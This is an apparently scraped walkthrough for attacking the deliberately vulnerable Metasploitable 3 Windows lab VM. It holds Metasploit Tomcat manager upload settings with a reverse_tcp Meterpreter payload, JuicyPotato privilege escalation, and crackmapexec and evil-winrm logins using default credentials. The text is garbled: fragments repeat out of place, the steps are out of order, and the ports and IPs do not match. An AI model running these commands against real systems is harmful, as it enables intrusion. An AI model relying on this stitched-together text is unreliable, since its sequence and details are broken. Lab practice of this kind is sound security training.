Metasploitable 3 Windows Walkthrough ⭐ Confirmed

# Use vulners script to find known CVEs
nmap --script vulners -sV -p 445,8080,8585,9200 192.168.1.100

If you landed as a non-admin user but have SeImpersonatePrivilege, you can elevate to SYSTEM.

Upload JuicyPotato.exe via Evil-WinRM:

upload JuicyPotato.exe C:\temp\

Then run:

Invoke-Command -ScriptBlock  C:\temp\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami > C:\temp\priv.txt" -t * 

If successful, SYSTEM.

This is a classic exploit. Tomcat is running on port 8282. metasploitable 3 windows walkthrough

You now have access to the Tomcat Manager. We can use this to upload a malicious JSP payload.

Using Metasploit for the Tomcat Exploit: # Use vulners script to find known CVEs

use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <Target_IP>
set RPORT 8282
set HttpUsername tomcat
set HttpPassword tomcat
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST <Your_IP>
run

Result: You should receive a Meterpreter session running as NT AUTHORITY\SYSTEM. You have already won! But for the sake of learning, let's look at the next vector.

If you have domain credentials (Metasploitable 3 has vagrant/vagrant and administrator/vagrant): If you landed as a non-admin user but

crackmapexec winrm 192.168.56.103 -u administrator -p vagrant -x "whoami"

Or use evil-winrm for an interactive shell:

evil-winrm -i 192.168.56.103 -u administrator -p vagrant

Now that you are SYSTEM, what do you do?